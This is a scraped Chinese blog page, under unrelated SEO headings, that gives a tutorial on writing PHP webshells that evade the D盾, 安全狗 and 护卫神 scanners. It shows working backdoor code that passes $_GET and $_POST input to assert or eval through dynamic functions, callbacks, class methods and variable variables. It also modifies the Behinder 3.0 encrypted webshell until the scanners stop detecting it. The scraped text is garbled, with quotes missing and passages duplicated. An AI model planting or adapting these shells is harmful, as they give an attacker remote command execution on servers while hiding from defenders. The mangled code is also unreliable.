北京网站建设公司排名网站开发外包业务怎么接

当前位置： 首页 > news >正文

北京网站建设公司排名,网站开发外包业务怎么接,辽宁建筑工程网,网站名称及网址webshell免杀之函数与变量玩法 前言 前文列举了一些用符号免杀的例子#xff0c;此篇文章就以函数和变量来尝试下免杀。 本文以PHP为例#xff0c;用PHP中函数和变量及语法特性#xff0c;在不隐藏函数关键字情况下进行免杀。 动态函数 PHP中支持一个功能叫 variable fu…webshell免杀之函数与变量玩法 前言 前文列举了一些用符号免杀的例子此篇文章就以函数和变量来尝试下免杀。 本文以PHP为例用PHP中函数和变量及语法特性在不隐藏函数关键字情况下进行免杀。 动态函数 PHP中支持一个功能叫 variable function 变量函数的意思。 例\(a‘system’; \)a(‘dir’); //最终是system(‘dir’); 当一个变量后边带括号那他就被视作一个函数。编译器会解析出变量的值假设值为符串system然后会去找当前是否存在名为“system()”的函数并执行它。 注eval 、echo、print 等看似是函数但并非函数而是语言构造器语言结构不支持该用法 动态函数利用时就可以达到隐藏危险函数关键字特征的目的我可以对函数关键字进行拆分编码然后拼接还原再利用动态函数特性执行。 例\(_GET[‘func’](\)_REQUEST[‘pass’]); //这就是动态函数webshell 这里就不给实例了很多免杀案例中都用到了这个特性。也是被疯狂查杀的特征。 回调函数 回调函数简单来说就是一个函数不是由我直接调用而是通过另一个函数去调用它。 这种方法很简单php中回调函数有很多个但大多已经被标记 经过测试找到一个目前还能免杀的 ?php
forward_static_call_array(assert,array(\(_GET[x])); ? ​D盾1级forward_static_call_array 如果尝试对回调函数 进行字符特征隐藏再用动态函数执行反而提升2级 魔术方法 PHP中以两个下划线开头的函数被称为魔术方法 是保留方法。 魔术方法是一种特殊的方法当对对象执行某些操作时会覆盖 PHP 的默认操作。 魔术方法中有两个函数 构造函数创建对象时会自动调用此方法初始化操作。 析构函数对象的引用被全部删除或销毁时执行。析构函数不能有参数 //__destruct() 析构函数 __construct() 构造函数 ?php class me{ public \)a ;
function __destruct(){ eval(\(this-a. ); } } \)a\(_GET[xxx]; \)b new me;
\(b-a \)a;
?D盾3级 可疑安全狗 护卫神 免杀 上面用析构函数D盾会检测到当尝试改特征时发现不用析构函数就能够免杀。 果然高端的免杀往往只需要最朴素的方式 ?php
class mexx{
public \(a ; function mexx(){ eval(\)this-a.; ); }
}
\(a\)_GET[xxx];
\(b new mexx; \)b-a \(a; echo \)b-mexx();
?全过。 可变变量 PHP还支持一种语法可变变量可以把一个变量的值作为另一个变量的变量名。 例如 变量a的值是‘c’ 变量c的值是‘ccc’当使用两个 变量符号时 \(a这就是一个可变变量,就不是a 这就是一个可变变量,就不是a这就是一个可变变量,就不是a 而是c。为什么会是c。 为什么会是c。为什么会是c 在编程中,代码执行时整体是从上到下,从左到右,但是赋值语句,则是从右到左。 测试来看可变变量是从右往左的 \)ac;
\(cflag; echo \)a; //结果 c
echo $\(a; //结果 flag // \)\(a 解析从右往左找到第一个变量符号 把\)a解析得到\(c 这里利用可变变量进行免杀 ?php \)c‘1’; //删掉此句 安全狗免杀
\(ac; \)\(a\)_POST[‘x’]; //\(c assert(\)c); //d盾特征
?变量c需要给一个值不能空值否侧d盾检测到变量未知内容会报4级 D盾1级其他免杀 这里有个想法可变变量能支持多少层哪只能变一次还是能多次。 \(ac; \)cflag;
\(flag123; echo \)\(a; //结果 flag echo \)$\(a; //结果 123 echo \)\(a; //结果 \)c
echo {$$\(a}; //结果 123最终发现可变变量是支持多层的但在双引号中不支持可变变量需要用花括号来包裹声明。 改造冰蝎 了解了前面的方法那就尝试对冰蝎的脚本改造一下。 先来看冰蝎3.0的默认脚本查杀一下 经过用D盾尝试发现file_get_contentsopenssl 等关键字都会被检测为木马最终在不动eval关键字情况下修改如下 ?php error_reporting(0); session_start(); ​ \)keye45e329feb5d925b;
\(_SESSION[k]\)key;
session_write_close();
\(aaafile_get_contents; \)bbbopenssl;
\(post\)aaa(php://input);
if(!extensionloaded(\(bbb)) { \)tbase64.decode;
\(post\)t(\(post.); for(\)i0;\(istrlen(\)post);\(i) { \)post[\(i] \)post[\(i]^\)key[\(i115]; } } else { \)postopenssl_decrypt(\(post, AES128, \)key); } \(arrexplode(|,\)post); \(func\)arr[0]; \(params\)arr[1];
class mexx{
public \(a ; function mexx(){ eval(\)this-a.); } }
\(b new mexx(); \)b-a \(params; echo \)b-mexx();
?原本的类中是用了魔术方法将对象当函数执行用回调函数去调用。 这里改为常规的方式调用将被查杀file_get_contents关键字用改成变量函数调用 本地查杀安全狗护卫神免杀D盾1级可疑 在线查杀效果
只有报了一个我推断是检测到eval关键字才告警遂换成echo函数试试是否免杀 结果还是被查杀看来检测的特征不是在这里。 经过不断尝试想到密钥 key的值是默认的e45e329feb5d925b会不会是它。 把key改掉如下 ?php
error_reporting(0);
session_start();
\(key47bce5c74f589f48; //aaa \)_SESSION[k]\(key; session_write_close(); \)aaafile_get_contents;
\(bbbopenssl; \)post\(aaa(php://input); if(!extension_loaded(\)bbb))
{
\(tbase64_.decode; \)post\(t(\)post.);
for(\(i0;\)istrlen(\(post);\)i) {
\(post[\)i] \(post[\)i]^\(key[\)i115]; }
}else{ \(postopenssl_decrypt(\)post, AES128, \(key); } \)arrexplode(|,\(post); \)func\(arr[0]; \)params\(arr[1]; class mexx{ public \)a ;
function mexx(){
eval(\(this-a.); } } \)b new mexx();
\(b-a \)params;
echo \(b-mexx(); ?查杀结果 脚本正常连接 总结 从上述案例能看出来想要免杀很简单不需要花里胡哨的操作只需要改变下结构或函数不需要变形编码关键字也能实现免杀 \)b-a \(params; echo \)b-mexx(); ? 查杀结果 [外链图片转存中…(img-X5Fmg7Yz-1676528059990)] 脚本正常连接 [外链图片转存中…(img-KDLqFrLK-1676528059990)] 总结 从上述案例能看出来想要免杀很简单不需要花里胡哨的操作只需要改变下结构或函数不需要变形编码关键字也能实现免杀 网络安全工程师企业级学习路线 这时候你当然需要一份系统性的学习路线 如图片过大被平台压缩导致看不清的话可以在文末下载无偿的大家也可以一起学习交流一下。 一些我收集的网络安全自学入门书籍 一些我白嫖到的不错的视频教程 上述资料【扫下方二维码】就可以领取了无偿分享